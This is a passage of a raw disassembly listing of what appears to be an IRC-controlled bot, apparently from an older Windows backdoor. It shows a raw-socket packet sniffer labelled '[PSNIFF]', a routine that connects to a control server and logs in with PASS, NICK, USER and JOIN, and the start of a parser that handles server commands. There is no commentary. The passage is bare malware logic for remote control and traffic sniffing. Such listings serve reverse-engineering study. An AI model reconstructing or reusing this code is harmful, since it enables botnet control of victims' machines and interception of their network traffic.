loc_40926F: ; CODE XREF: sub_40913E+E2�j
push esi
push esi
lea eax, [ebp+74h+var_20]
push eax
push esi
push esi
push 4
lea eax, [ebp+74h+var_8]
push eax
push 98000001h
push edi
call dword_43A478 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_4092B0
call dword_43A45C ; WSAGetLastError
push eax
lea eax, [ebp+74h+var_2B4]
push offset aPsniffErrorWsa ; "[PSNIFF]: Error: WSAIoctl() failed, ret"...
push eax
call sub_416905
add esp, 0Ch
cmp [ebp+74h+var_28], esi
jnz short loc_40925C
jmp short loc_409242
; ---------------------------------------------------------------------------
loc_4092B0: ; CODE XREF: sub_40913E+14E�j
mov ebx, 0FFFFh
jmp loc_409398
; ---------------------------------------------------------------------------
loc_4092BA: ; CODE XREF: sub_40913E+281�j
cmp byte ptr [ebp-10237h], 6
jnz loc_409398
cmp [ebp+74h+var_10293], 18h
mov eax, [ebp+74h+var_102A8]
mov [ebp+74h+var_C], eax
jnz loc_409398
lea eax, [ebp+74h+var_1028C]
push offset aPsniff_0 ; "[PSNIFF]"
push eax
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jnz loc_409398
mov eax, offset dword_42F758
xor edi, edi
mov [ebp+74h+arg_0], eax
loc_409302: ; CODE XREF: sub_40913E+1DF�j
push eax
lea eax, [ebp+74h+var_1028C]
push eax
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jnz short loc_409321
inc edi
add [ebp+74h+arg_0], 18h
mov eax, [ebp+74h+arg_0]
jnz short loc_409302
jmp short loc_409398
; ---------------------------------------------------------------------------
loc_409321: ; CODE XREF: sub_40913E+1D5�j
lea eax, [ebp+74h+var_1028C]
push eax
push [ebp+74h+var_102A0]
call dword_43A498 ; ntohs
movzx eax, ax
push eax
push [ebp+74h+var_C]
call dword_43A420 ; inet_ntoa
push eax
lea eax, [edi+edi*2]
mov eax, dword_42F76C[eax*8]
push off_42F748[eax*4]
lea eax, [ebp+74h+var_2B4]
push offset aPsniffSuspicio ; "[PSNIFF]: Suspicious %s packet from: %s"...
push 200h
push eax
call sub_416B5D
add esp, 1Ch
cmp [ebp+74h+var_28], esi
jnz short loc_40938B
push esi
push [ebp+74h+var_2C]
lea eax, [ebp+74h+var_2B4]
push eax
lea eax, [ebp+74h+var_B0]
push eax
push [ebp+74h+var_B4]
call sub_405D20
add esp, 14h
loc_40938B: ; CODE XREF: sub_40913E+231�j
lea eax, [ebp+74h+var_2B4]
push eax
call sub_401ECD
pop ecx
loc_409398: ; CODE XREF: sub_40913E+177�j
; sub_40913E+183�j ...
xor eax, eax
lea edi, [ebp+74h+var_102B4]
mov ecx, 3FFFh
rep stosd
stosw
push esi
stosb
push ebx
lea eax, [ebp+74h+var_102B4]
push eax
push [ebp+74h+var_4]
call dword_43A304 ; recv
cmp eax, 0FFFFFFFFh
jnz loc_4092BA
call dword_43A45C ; WSAGetLastError
push eax
push offset aPsniffErrorRec ; "[PSNIFF]: Error: recv() failed, returne"...
lea eax, [ebp+74h+var_2B4]
push 200h
push eax
call sub_416B5D
add esp, 10h
cmp [ebp+74h+var_28], esi
jnz short loc_409404
push esi
push [ebp+74h+var_2C]
lea eax, [ebp+74h+var_2B4]
push eax
lea eax, [ebp+74h+var_B0]
push eax
push [ebp+74h+var_B4]
call sub_405D20
add esp, 14h
loc_409404: ; CODE XREF: sub_40913E+2AA�j
lea eax, [ebp+74h+var_2B4]
push eax
call sub_401ECD
pop ecx
push [ebp+74h+var_4]
loc_409414: ; CODE XREF: sub_40913E+12C�j
call dword_43A4B0 ; closesocket
push [ebp+74h+var_30]
call sub_41397A
loc_409422: ; CODE XREF: sub_40913E+BE�j
pop ecx
push esi
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_40913E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=58h
sub_40942B proc near ; CODE XREF: sub_4096A7+D0�p
var_1E1C = byte ptr -1E1Ch
var_E1C = byte ptr -0E1Ch
var_64C = byte ptr -64Ch
var_5AC = byte ptr -5ACh
var_4AC = byte ptr -4ACh
var_2AC = byte ptr -2ACh
var_AC = byte ptr -0ACh
var_2C = byte ptr -2Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov eax, 1E1Ch
lea ebp, [esp-58h]
call sub_416B20
push ebx
push esi
xor ebx, ebx
push 2
mov [ebp+58h+var_14], ebx
lea eax, [ebp+58h+var_5AC]
pop ecx
loc_40944A: ; CODE XREF: sub_40942B+28�j
and byte ptr [eax], 0
add eax, 80h
dec ecx
jnz short loc_40944A
cmp byte_480ABC, 0
jz short loc_409473
push offset byte_480ABC
push offset aPassS ; "PASS %s\r\n"
push [ebp+58h+arg_0]
call sub_405CD5
add esp, 0Ch
loc_409473: ; CODE XREF: sub_40942B+31�j
push [ebp+58h+arg_C]
lea eax, [ebp+58h+var_2C]
push ebx
push ebx
push 2
push eax
call sub_411098
add esp, 10h
push eax
push [ebp+58h+arg_C]
lea eax, [ebp+58h+var_AC]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_416905
lea eax, [ebp+58h+var_AC]
add esp, 14h
lea esi, [eax+1]
loc_4094A1: ; CODE XREF: sub_40942B+7B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4094A1
push ebx
sub eax, esi
push eax
lea eax, [ebp+58h+var_AC]
push eax
push [ebp+58h+arg_0]
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4094D9
push [ebp+58h+arg_0]
call dword_43A4B0 ; closesocket
push 7D0h
call dword_422000 ; Sleep
xor eax, eax
jmp loc_4096A0
; ---------------------------------------------------------------------------
loc_4094D9: ; CODE XREF: sub_40942B+91�j
push edi
jmp loc_409666
; ---------------------------------------------------------------------------
loc_4094DF: ; CODE XREF: sub_40942B+262�j
lea eax, [ebp+58h+var_E1C]
push eax
lea eax, [ebp+58h+var_1E1C]
push eax
call sub_40726A
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+58h+var_18], eax
mov [ebp+58h+var_10], ebx
jle loc_409666
lea esi, [ebp+58h+var_E1C]
mov [ebp+58h+var_C], esi
loc_40950B: ; CODE XREF: sub_40942B+235�j
push offset asc_4285C8 ; " :"
push dword ptr [esi]
xor eax, eax
mov ecx, 80h
lea edi, [ebp+58h+var_2AC]
rep stosd
call sub_4173D0
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+58h+var_4], eax
jz short loc_409535
add [ebp+58h+var_4], 2
jmp short loc_40953A
; ---------------------------------------------------------------------------
loc_409535: ; CODE XREF: sub_40942B+102�j
mov eax, [esi]
mov [ebp+58h+var_4], eax
loc_40953A: ; CODE XREF: sub_40942B+108�j
push 1FFh
push [ebp+58h+var_4]
lea eax, [ebp+58h+var_2AC]
push eax
call sub_4169C0
lea eax, [ebp+58h+var_2AC]
push offset asc_4285C4 ; "|"
push eax
call sub_417779
add esp, 14h
test eax, eax
mov [ebp+58h+var_8], eax
lea ebx, [ebp+58h+var_2AC]
jz loc_40964F
loc_409573: ; CODE XREF: sub_40942B+21E�j
xor eax, eax
mov ecx, 80h
lea edi, [ebp+58h+var_4AC]
rep stosd
mov eax, [esi]
mov ecx, [ebp+58h+var_4]
sub ecx, eax
push ecx
push eax
lea eax, [ebp+58h+var_4AC]
push eax
call sub_4169C0
mov eax, [ebp+58h+var_8]
add esp, 0Ch
mov esi, eax
loc_40959F: ; CODE XREF: sub_40942B+179�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40959F
lea edi, [ebp+58h+var_4AC]
sub eax, esi
dec edi
loc_4095AF: ; CODE XREF: sub_40942B+18A�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4095AF
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+58h+var_8]
and ecx, 3
rep movsb
lea esi, [eax+1]
loc_4095CB: ; CODE XREF: sub_40942B+1A5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4095CB
sub eax, esi
lea ebx, [ebx+eax+1]
push offset asc_4285C4 ; "|"
push ebx
call sub_417779
pop ecx
xor esi, esi
pop ecx
mov [ebp+58h+var_8], eax
inc esi
loc_4095EB: ; CODE XREF: sub_40942B+206�j
push [ebp+58h+arg_1C]
lea eax, [ebp+58h+var_14]
push esi
push eax
lea eax, [ebp+58h+var_64C]
push eax
lea eax, [ebp+58h+var_5AC]
push eax
push [ebp+58h+arg_18]
lea eax, [ebp+58h+var_4AC]
push [ebp+58h+arg_C]
push [ebp+58h+arg_8]
push [ebp+58h+arg_4]
push [ebp+58h+arg_0]
push eax
call sub_409806
add esp, 2Ch
dec eax
mov esi, eax
test esi, esi
jle short loc_409633
push 0FAh
call dword_422000 ; Sleep
jmp short loc_4095EB
; ---------------------------------------------------------------------------
loc_409633: ; CODE XREF: sub_40942B+1F9�j
cmp esi, 0FFFFFFFDh
jz short loc_40969C
cmp esi, 0FFFFFFFEh
jz short loc_409697
cmp esi, 0FFFFFFFFh
jz short loc_409693
cmp [ebp+58h+var_8], 0
mov esi, [ebp+58h+var_C]
jnz loc_409573
loc_40964F: ; CODE XREF: sub_40942B+142�j
inc [ebp+58h+var_10]
mov eax, [ebp+58h+var_10]
add esi, 4
xor ebx, ebx
cmp eax, [ebp+58h+var_18]
mov [ebp+58h+var_C], esi
jl loc_40950B
loc_409666: ; CODE XREF: sub_40942B+AF�j
; sub_40942B+D1�j
xor eax, eax
push ebx
lea edi, [ebp+58h+var_1E1C]
mov ecx, 400h
rep stosd
push 1000h
lea eax, [ebp+58h+var_1E1C]
push eax
push [ebp+58h+arg_0]
call dword_43A304 ; recv
test eax, eax
jg loc_4094DF
loc_409693: ; CODE XREF: sub_40942B+215�j
xor eax, eax
jmp short loc_40969F
; ---------------------------------------------------------------------------
loc_409697: ; CODE XREF: sub_40942B+210�j
xor eax, eax
inc eax
jmp short loc_40969F
; ---------------------------------------------------------------------------
loc_40969C: ; CODE XREF: sub_40942B+20B�j
push 2
pop eax
loc_40969F: ; CODE XREF: sub_40942B+26A�j
; sub_40942B+26F�j
pop edi
loc_4096A0: ; CODE XREF: sub_40942B+A9�j
pop esi
pop ebx
add ebp, 58h
leave
retn
sub_40942B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4096A7 proc near ; CODE XREF: sub_40FAD0+47C�p
; DATA XREF: sub_409806+2F18�o
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 59h
xor ebx, ebx
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
inc ebx
rep movsd
mov [eax+160h], ebx
jmp loc_4097A2
; ---------------------------------------------------------------------------
loc_4096D1: ; CODE XREF: sub_4096A7+129�j
push 7
pop ecx
xor eax, eax
push eax
push dword_42FCE0
lea edi, [ebp+var_2C]
push dword_42FCDC
rep stosd
lea eax, [ebp+var_2C]
push eax
call sub_411098
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh
add eax, offset byte_43B258
push edi
push eax
call sub_4169C0
add esp, 1Ch
push 6
push ebx
push 2
call dword_43A39C ; socket
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
mov dword_43B24C[eax], esi
push 10h
lea eax, [ebp+var_10]
push eax
push esi
call dword_43A34C ; connect
cmp eax, 0FFFFFFFFh
jz loc_4097D8
lea eax, [ebp+var_18C]
push eax
push offset aMainConnectedT ; "[MAIN]: Connected to %s."
call sub_401F41
push [ebp+var_38]
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
push [ebp+var_190]
lea eax, [ebp+var_CC]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_40942B
add esp, 28h
push esi
mov edi, eax
call dword_43A4B0 ; closesocket
test edi, edi
jz short loc_4097A2
cmp edi, ebx
jnz short loc_40979D
push 1D4C0h
call dword_422000 ; Sleep
jmp short loc_4097A2
; ---------------------------------------------------------------------------
loc_40979D: ; CODE XREF: sub_4096A7+E7�j
cmp edi, 2
jz short loc_4097F3
loc_4097A2: ; CODE XREF: sub_4096A7+25�j
; sub_4096A7+E3�j ...
push [ebp+var_3C]
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
mov [ebp+var_10], 2
call dword_43A4F4 ; ntohs
mov [ebp+var_E], ax
lea eax, [ebp+var_18C]
push eax
call sub_40873C
test eax, eax
pop ecx
mov [ebp+var_C], eax
jnz loc_4096D1
jmp short loc_4097FF
; ---------------------------------------------------------------------------
loc_4097D8: ; CODE XREF: sub_4096A7+92�j
push esi
call dword_43A4B0 ; closesocket
call sub_408765
push 7D0h
call dword_422000 ; Sleep
mov eax, ebx
jmp short loc_4097FF
; ---------------------------------------------------------------------------
loc_4097F3: ; CODE XREF: sub_4096A7+F9�j
push [ebp+var_34]
call sub_41397A
pop ecx
push 2
pop eax
loc_4097FF: ; CODE XREF: sub_4096A7+12F�j
; sub_4096A7+14A�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_4096A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409806 proc near ; CODE XREF: sub_40942B+1EC�p
var_27F0 = byte ptr -27F0h
var_23F0 = byte ptr -23F0h
var_21F0 = byte ptr -21F0h
var_1FF0 = byte ptr -1FF0h
var_1EF0 = byte ptr -1EF0h
var_1DF0 = byte ptr -1DF0h
var_1DEC = byte ptr -1DECh
var_1CEC = dword ptr -1CECh
var_1CE8 = dword ptr -1CE8h
var_1CE4 = byte ptr -1CE4h
var_1C64 = byte ptr -1C64h
var_1BE4 = byte ptr -1BE4h
var_1B64 = byte ptr -1B64h
var_1AE4 = byte ptr -1AE4h
var_1A64 = dword ptr -1A64h
var_1A60 = dword ptr -1A60h
var_1A5C = dword ptr -1A5Ch
var_1A58 = dword ptr -1A58h
var_1A54 = byte ptr -1A54h
var_19D4 = byte ptr -19D4h
var_1954 = byte ptr -1954h
var_18D4 = byte ptr -18D4h
var_1854 = dword ptr -1854h
var_1850 = dword ptr -1850h
var_184C = dword ptr -184Ch
var_1848 = dword ptr -1848h
var_1844 = dword ptr -1844h
var_1840 = byte ptr -1840h
var_17C0 = byte ptr -17C0h
var_1740 = byte ptr -1740h
var_16C0 = dword ptr -16C0h
var_16BC = dword ptr -16BCh
var_16B8 = dword ptr -16B8h
var_16B4 = dword ptr -16B4h
var_16B0 = byte ptr -16B0h
var_16AC = byte ptr -16ACh
var_162C = byte ptr -162Ch
var_15EC = byte ptr -15ECh
var_155C = dword ptr -155Ch
var_1558 = dword ptr -1558h
var_1554 = dword ptr -1554h
var_1550 = dword ptr -1550h
var_154C = byte ptr -154Ch
var_1548 = byte ptr -1548h
var_1448 = dword ptr -1448h
var_1444 = byte ptr -1444h
var_1440 = dword ptr -1440h
var_143C = byte ptr -143Ch
var_13BC = byte ptr -13BCh
var_1340 = byte ptr -1340h
var_12B8 = byte ptr -12B8h
var_123C = dword ptr -123Ch
var_1238 = dword ptr -1238h
var_1234 = dword ptr -1234h
var_1230 = byte ptr -1230h
var_11B4 = dword ptr -11B4h
var_11B0 = dword ptr -11B0h
var_11AC = dword ptr -11ACh
var_11A8 = dword ptr -11A8h
var_11A4 = dword ptr -11A4h
var_11A0 = byte ptr -11A0h
var_1120 = byte ptr -1120h
var_10A0 = byte ptr -10A0h
var_1020 = dword ptr -1020h
var_101C = dword ptr -101Ch
var_1018 = dword ptr -1018h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_FFC = byte ptr -0FFCh
var_F7C = byte ptr -0F7Ch
var_EFC = dword ptr -0EFCh
var_EF8 = dword ptr -0EF8h
var_EF4 = dword ptr -0EF4h
var_EEC = dword ptr -0EECh
var_EE8 = dword ptr -0EE8h
var_EE4 = dword ptr -0EE4h
var_EDC = byte ptr -0EDCh
var_E8C = dword ptr -0E8Ch
var_E88 = byte ptr -0E88h
var_E84 = dword ptr -0E84h
var_E80 = byte ptr -0E80h
var_E00 = byte ptr -0E00h
var_D00 = byte ptr -0D00h
var_C01 = byte ptr -0C01h
var_C00 = byte ptr -0C00h
var_B00 = dword ptr -0B00h
var_AFC = dword ptr -0AFCh
var_AF8 = dword ptr -0AF8h
var_AF4 = dword ptr -0AF4h
var_AF0 = dword ptr -0AF0h
var_AEC = dword ptr -0AECh
var_AE8 = dword ptr -0AE8h
var_AE4 = dword ptr -0AE4h
var_AE0 = dword ptr -0AE0h
var_ADC = byte ptr -0ADCh
var_ABC = dword ptr -0ABCh
var_AB8 = byte ptr -0AB8h
var_A7C = dword ptr -0A7Ch
var_A78 = byte ptr -0A78h
var_A38 = byte ptr -0A38h
var_9F8 = byte ptr -9F8h
var_978 = byte ptr -978h
var_8F8 = dword ptr -8F8h
var_8F4 = dword ptr -8F4h
var_8F0 = dword ptr -8F0h
var_8EC = dword ptr -8ECh
var_8E8 = dword ptr -8E8h
var_8E4 = dword ptr -8E4h
var_8E0 = dword ptr -8E0h
var_8DC = byte ptr -8DCh
var_85C = dword ptr -85Ch
var_858 = byte ptr -858h
var_84C = byte ptr -84Ch
var_848 = byte ptr -848h
var_7D8 = byte ptr -7D8h
var_758 = dword ptr -758h
var_754 = dword ptr -754h
var_750 = dword ptr -750h
var_74C = dword ptr -74Ch
var_748 = byte ptr -748h
var_73C = byte ptr -73Ch
var_72C = dword ptr -72Ch
var_728 = byte ptr -728h
var_6A8 = byte ptr -6A8h
var_628 = dword ptr -628h
var_624 = dword ptr -624h
var_620 = dword ptr -620h
var_61C = dword ptr -61Ch
var_618 = dword ptr -618h
var_614 = dword ptr -614h
var_610 = dword ptr -610h
var_60C = dword ptr -60Ch
var_608 = byte ptr -608h
var_5F8 = byte ptr -5F8h
var_578 = byte ptr -578h
var_4F8 = dword ptr -4F8h
var_4F4 = dword ptr -4F4h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = dword ptr -4E8h
var_4DC = dword ptr -4DCh
var_4D8 = dword ptr -4D8h
var_4D0 = dword ptr -4D0h
var_4CC = dword ptr -4CCh
var_4C8 = dword ptr -4C8h
var_4C4 = dword ptr -4C4h
var_4BC = byte ptr -4BCh
var_4A0 = dword ptr -4A0h
var_49C = byte ptr -49Ch
var_498 = dword ptr -498h
var_494 = byte ptr -494h
var_488 = dword ptr -488h
var_484 = byte ptr -484h
var_41C = byte ptr -41Ch
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = dword ptr -404h
var_400 = dword ptr -400h
var_3FC = dword ptr -3FCh
var_3F8 = dword ptr -3F8h
var_3F4 = dword ptr -3F4h
var_3F0 = byte ptr -3F0h
var_38F = byte ptr -38Fh
var_38E = byte ptr -38Eh
var_38C = byte ptr -38Ch
var_38B = byte ptr -38Bh
var_388 = dword ptr -388h
var_384 = dword ptr -384h
var_380 = dword ptr -380h
var_37C = byte ptr -37Ch
var_354 = byte ptr -354h
var_334 = dword ptr -334h
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = byte ptr -2F0h
var_F0 = byte ptr -0F0h
var_D8 = word ptr -0D8h
var_D6 = word ptr -0D6h
var_D4 = dword ptr -0D4h
var_C8 = byte ptr -0C8h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_64 = byte ptr -64h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 27F0h
call sub_416B20
push ebx
push esi
push edi
mov esi, 80h
xor eax, eax
push 1Bh
push [ebp+arg_10]
xor ebx, ebx
mov ecx, esi
lea edi, [ebp+var_2F0]
rep stosd
lea eax, [ebp+var_4BC]
push eax
mov [ebp+var_20], 3
mov [ebp+var_18], ebx
mov [ebp+var_1C], ebx
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_4169C0
add esp, 0Ch
xor eax, eax
cmp [ebp+arg_0], ebx
jz loc_409A86
mov ecx, esi
mov esi, 1FFh
push esi
push [ebp+arg_0]
lea edi, [ebp+var_21F0]
rep stosd
lea eax, [ebp+var_21F0]
push eax
call sub_4169C0
lea eax, [ebp+var_21F0]
push offset asc_4285C8 ; " :"
push eax
call sub_4173D0
mov [ebp+var_14], eax
push esi
lea eax, [ebp+var_21F0]
push eax
lea eax, [ebp+var_23F0]
push eax
call sub_4169C0
mov esi, offset asc_422B08 ; " "
lea eax, [ebp+var_23F0]
push esi
push eax
call sub_417779
xor edi, edi
add esp, 28h
mov [ebp+var_A4], eax
inc edi
loc_4098C3: ; CODE XREF: sub_409806+D1�j
push esi
push ebx
call sub_417779
mov [ebp+edi*4+var_A4], eax
inc edi
cmp edi, 20h
pop ecx
pop ecx
jl short loc_4098C3
mov ebx, [ebp+var_A4]
xor esi, esi
cmp ebx, esi
jz loc_409A84
cmp [ebp+var_A0], esi
jz loc_409A84
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_3F0]
push 1Fh
rep stosd
pop edx
loc_409905: ; CODE XREF: sub_409806+137�j
lea ecx, [ebp+edx*4+var_A4]
mov eax, [ecx]
cmp eax, esi
jz short loc_40993C
cmp byte ptr [eax], 2Dh
jnz short loc_40993F
cmp byte ptr [eax+2], 0
jnz short loc_40993F
movsx edi, byte ptr [eax+1]
and byte ptr [eax], 0
and byte ptr [eax+1], 0
and byte ptr [eax+2], 0
mov [ecx], esi
mov ebx, [ebp+var_A4]
mov [ebp+edi+var_3F0], 1
loc_40993C: ; CODE XREF: sub_409806+10A�j
dec edx
jns short loc_409905
loc_40993F: ; CODE XREF: sub_409806+10F�j
; sub_409806+115�j
cmp byte ptr [ebp+var_380+3], 0
jz short loc_40994F
mov [ebp+var_C], 1
loc_40994F: ; CODE XREF: sub_409806+140�j
cmp byte ptr [ebp+var_384+2], 0
jz short loc_409962
mov [ebp+var_C], esi
mov [ebp+var_4], 1
loc_409962: ; CODE XREF: sub_409806+150�j
cmp byte ptr [ebx], 0Ah
jz short loc_40999C
push 7Fh
lea eax, [ebp+var_8DC]
push ebx
push eax
call sub_4169C0
push 17h
lea eax, [ebx+1]
push eax
lea eax, [ebp+var_F0]
push eax
call sub_4169C0
lea eax, [ebp+var_F0]
push offset asc_42A9BC ; "!"
push eax
call sub_417779
add esp, 20h
loc_40999C: ; CODE XREF: sub_409806+15F�j
push 5
mov edi, ebx
mov esi, offset aPing ; "PING"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_4099EA
push [ebp+var_A0]
mov byte ptr [ebx+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
call sub_405CD5
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp dword ptr [eax], 0
jnz loc_409A84
loc_4099D2: ; CODE XREF: sub_409806+3D7�j
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
loc_4099DD: ; CODE XREF: sub_409806+6D3�j
; sub_409806+939�j ...
push [ebp+arg_4]
call sub_405CD5
jmp loc_40E78A
; ---------------------------------------------------------------------------
loc_4099EA: ; CODE XREF: sub_409806+1A4�j
mov edx, [ebp+var_A0]
push 4
pop eax
mov edi, edx
mov esi, offset a001 ; "001"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jz loc_40FA88
mov edi, edx
mov esi, offset a005 ; "005"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jz loc_40FA88
mov edi, edx
mov esi, offset a302 ; "302"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jnz short loc_409A4D
push offset a@ ; "@"
push [ebp+var_98]
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jz short loc_409A84
push 9Fh
inc eax
push eax
push [ebp+arg_1C]
jmp loc_409CF2
; ---------------------------------------------------------------------------
loc_409A4D: ; CODE XREF: sub_409806+220�j
mov ecx, eax
mov edi, edx
mov esi, offset a433 ; "433"
xor eax, eax
repe cmpsb
jnz short loc_409A8C
push eax
push dword_42FCE0
push dword_42FCDC
push [ebp+arg_10]
call sub_411098
push [ebp+arg_10]
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_405CD5
add esp, 1Ch
loc_409A84: ; CODE XREF: sub_409806+DD�j
; sub_409806+E9�j ...
xor eax, eax
loc_409A86: ; CODE XREF: sub_409806+52�j
inc eax
loc_409A87: ; CODE XREF: sub_409806+16FE�j
; sub_409806+34FA�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_409A8C: ; CODE XREF: sub_409806+254�j
mov edi, [ebp+arg_18]
push 2
pop edx
loc_409A92: ; CODE XREF: sub_409806+2CD�j
lea eax, [ebp+var_8DC]
mov esi, edi
loc_409A9A: ; CODE XREF: sub_409806+2B0�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_409ABC
test cl, cl
jz short loc_409AB8
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_409ABC
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_409A9A
loc_409AB8: ; CODE XREF: sub_409806+29E�j
xor eax, eax
jmp short loc_409AC1
; ---------------------------------------------------------------------------
loc_409ABC: ; CODE XREF: sub_409806+29A�j
; sub_409806+2A8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_409AC1: ; CODE XREF: sub_409806+2B4�j
test eax, eax
jnz short loc_409ACC
mov [ebp+var_1C], 1
loc_409ACC: ; CODE XREF: sub_409806+2BD�j
add edi, 80h
dec edx
jnz short loc_409A92
mov edi, [ebp+var_A0]
push 5
mov esi, offset aKick ; "KICK"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_409BE2
mov edi, [ebp+arg_18]
push 2
pop ebx
loc_409AF3: ; CODE XREF: sub_409806+393�j
cmp byte ptr [edi], 0
jz loc_409B92
push 7Fh
lea eax, [ebp+var_8DC]
push edi
push eax
call sub_4169C0
add esp, 0Ch
cmp [ebp+var_98], 0
jz short loc_409B92
mov esi, [ebp+var_98]
lea eax, [ebp+var_F0]
loc_409B23: ; CODE XREF: sub_409806+339�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_409B45
test cl, cl
jz short loc_409B41
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_409B45
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_409B23
loc_409B41: ; CODE XREF: sub_409806+327�j
xor eax, eax
jmp short loc_409B4A
; ---------------------------------------------------------------------------
loc_409B45: ; CODE XREF: sub_409806+323�j
; sub_409806+331�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_409B4A: ; CODE XREF: sub_409806+33D�j
test eax, eax
jnz short loc_409B92
and [edi], al
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_2F0]
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
push eax
call sub_416905
lea eax, [ebp+var_2F0]
push eax
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4]
call sub_405CD5
lea eax, [ebp+var_2F0]
push eax
call sub_401ECD
add esp, 20h
loc_409B92: ; CODE XREF: sub_409806+2F0�j
; sub_409806+30F�j ...
add edi, 80h
dec ebx
jnz loc_409AF3
mov esi, [ebp+var_98]
mov eax, [ebp+arg_10]
loc_409BA8: ; CODE XREF: sub_409806+3BE�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_409BCA
test cl, cl
jz short loc_409BC6
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_409BCA
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_409BA8
loc_409BC6: ; CODE XREF: sub_409806+3AC�j
xor eax, eax
jmp short loc_409BCF
; ---------------------------------------------------------------------------
loc_409BCA: ; CODE XREF: sub_409806+3A8�j
; sub_409806+3B6�j
